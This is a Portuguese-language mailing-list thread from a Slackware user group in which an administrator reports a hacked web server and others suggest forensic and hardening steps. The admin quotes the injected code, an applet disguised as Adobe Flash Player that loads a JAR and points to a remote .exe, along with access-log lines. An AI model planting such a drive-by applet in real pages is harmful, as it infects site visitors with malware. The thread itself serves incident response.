Valeu Victório, vou fazer esse pente fino ai, agora tem muita coisa pra ficar atento. Se eu descobrir mais coisas respondo aqui na lista.
Obrigado a todos, ajudaram bastante. Jorge 2009/8/12 Fábio <[email protected]> > > Nunca uso php sem "safe_mode on" :) > > Att: Fábio Gomes dos Santos > > Victório escreveu: > > Vamos lá. Eu já passei por isso algumas vezes e, em todos os meus casos > foi > > falha de programação do site rodando no servidor. Fora todas as dicas que > o > > pessoal já disse: > > > > 1. Verifique se foram adicionados agendamentos no seu cron: > > > > for i in `cat /etc/passwd|cut -d: -f1`; do echo user: $i; crontab -u $i > -l; > > done > > > > 2. Verifique por arquivos estranhos em _todos_ os diretórios com > permissão > > de escrita para todos os usuários, por ex. > > > > /tmp > > /var/tmp > > /var/spool/* (sim temos diretórios abertos no /var/spool) > > > > muitos arquivos estão em como /var/tmp/.../botircmaldito > > > > 3. Pesquise em todos os diretórios do seu servidor web por arquivos cujo > > dono seja o usuário do seu servidor web para tentar descobrir mais > arquivos > > suspeitos. Provavelmente você deve ter um phpshell no seu servidor para > > facilitar a vida do cara que jogou o vírus aí. > > > > 4. Verifique os processos que tem conexões com a internet. 2 servidores > meus > > tiveram bot irc e os nomes dos processos estavamos escondidos com o xhide > > (programinha muito bom). Você pode usar o netstat. como netstat -anp > |grep > > -vi unix (isso é o basico mas já pega muita coisa) > > > > 5. Se seu servidor já estava com todos os softwares atualizados, então a > > chance de ser uma falha em alguns deles é pequena. Nesse caso o cara deve > > ter jogado os arquivos por algum site no seu servidor que permita o > upload > > de arquivos. > > > > 6. Muito trabalhoso, mas tente colocar o mod_security no apache. Pelo > menos > > coloque ele no modo de DetectionOnly para ter os logs > > > > ############################################### > > Victório Felipe > > http://www.wa.pro.br > > linux user #306117 - counter.li.org > > Slackware Linux FreeBSD > > Because it works! The Power To Serve > > ############################################### > > > > > > 2009/8/11 Jorge Filho <[email protected]> > > > >> Olá pessoal, obrigado pelas ajudas. > >> O que eu consegui rastrear até agora foi o seguinte, o cara conseguiu > >> editar o index.php do site e colocou o seguinte applet: > >> > >> <applet name="Adobe FlashPlayer" code="Inicio.class" archive=" > >> http://www.exemplo.com/audio/FlashPlayer.jar"; height="10" width="1"> > >> <param name="url" value=" > >> http://merlincosmeticos.com.br/cache/foto125.exe";> > >> </applet> > >> > >> Ele também adicionou esse FlashPlayer.jar no diretório audio do > servidor, e > >> tinha também esse arquivo asd.html na raiz. > >> As datas dos arquivos são: > >> > >> -rw------- 1 www-data www-data 9,8K 2009-08-10 22:53 FlashPlayer.jar > >> -r-xr-xr-x 1 www-data www-data 12K 2009-08-11 14:03 index.php > >> > >> No logo do /var/log/apache/access.log está o seguinte: > >> > >> 201.78.54.160 - - [10/Aug/2009:15:03:17 -0300] "GET /asd.html HTTP/1.1" > 200 > >> 808 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; pt-BR; rv:1.9.0.13) > >> Gecko/2009073022 Firefox/3.0.13" > >> 189.26.198.238 - - [10/Aug/2009:15:07:01 -0300] "GET /asd.html HTTP/1.1" > >> 200 808 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; pt-BR; rv:1.9.1.2) > >> Gecko/20090729 Firefox/3.5.2 (.NET CLR 3.5.30729)" > >> 189.26.198.238 - - [10/Aug/2009:15:07:39 -0300] "GET /asd.html HTTP/1.1" > >> 304 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; pt-BR; rv:1.9.1.2) > >> Gecko/20090729 Firefox/3.5.2 (.NET CLR 3.5.30729)" > >> 189.26.198.238 - - [10/Aug/2009:15:09:43 -0300] "GET /asd.html HTTP/1.1" > >> 304 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; pt-BR; rv:1.9.1.2) > >> Gecko/20090729 Firefox/3.5.2 (.NET CLR 3.5.30729)" > >> 201.89.53.126 - - [10/Aug/2009:15:48:12 -0300] "GET /asd.html HTTP/1.1" > 200 > >> 808 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; > >> SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.30618)" > >> > >> Se procurar FlashPlayer.jar no log então, acha muito, porque muita gente > >> deve ter baixado. > >> > >> Outra coisa que acho que pode ser uma falha na segurança também é que > todos > >> os arquivos estavam com permissão 777 > >> > >> Sobre o ftp, tem alguns usuários com senha fraca sim, mais o ftp roda em > >> chroot com autenticação mysql, o usuário já cai na pasta sem ter como > sair, > >> acho dificil ter acontecido algo pelo ftp, mas claro, nada é impossível. > >> > >> Vou analisar mais coisas aqui, mas to meio confuso, é a primeira vez que > >> tenho um ataque no servidor, situação estranha, mais agora tenho que > >> aprender como o cara fez isso pra consertar o que tá errado. > >> > >> > >> 2009/8/11 Herbert Faleiros <[email protected]> > >> > >> > >>> On Tue 11 Aug 2009 18:19:12 Jorge Filho wrote: > >>>> Hoje aconteceu algo muito estranho no meu server web, de manhã, quando > >>>> alguém entrava no site aparecia uma tela pedindo pra executar um > >>>> javascript. Qual não foi minha surpresa quando vi um arquivo diferente > >>> na > >>>> raiz do meu site, com nome de asd.html? > >>>> > >>>> Com é possível isso ter acontecido? Que tipo de configuração eu devo > >>>> verificar se tem problema? Fiquei sem saber o que fazer. > >>> > >>> examine seus logs, com certeza vai encontrar mais informações... > Verifique > >>> os > >>> softwares em execução e procure atualizações de segurança. Execute > >>> ferramentas > >>> p/ buscar por rootkits e exploits e verifique quem tem mais acesso ao > seu > >>> sistema (tá com cara de que isso foi "manual"). > >>> > >>> -- > >>> Herbert > >>> > >>> > >>> > >>> > > > > > > > > > > > > --~--~---------~--~----~------------~-------~--~----~ GUS-BR - Grupo de Usuários de Slackware Brasil http://www.slackwarebrasil.org/ http://groups.google.com/group/slack-users-br Antes de perguntar: http://www.istf.com.br/perguntas/ Para sair da lista envie um e-mail para: [email protected] -~----------~----~----~----~------~----~------~--~---
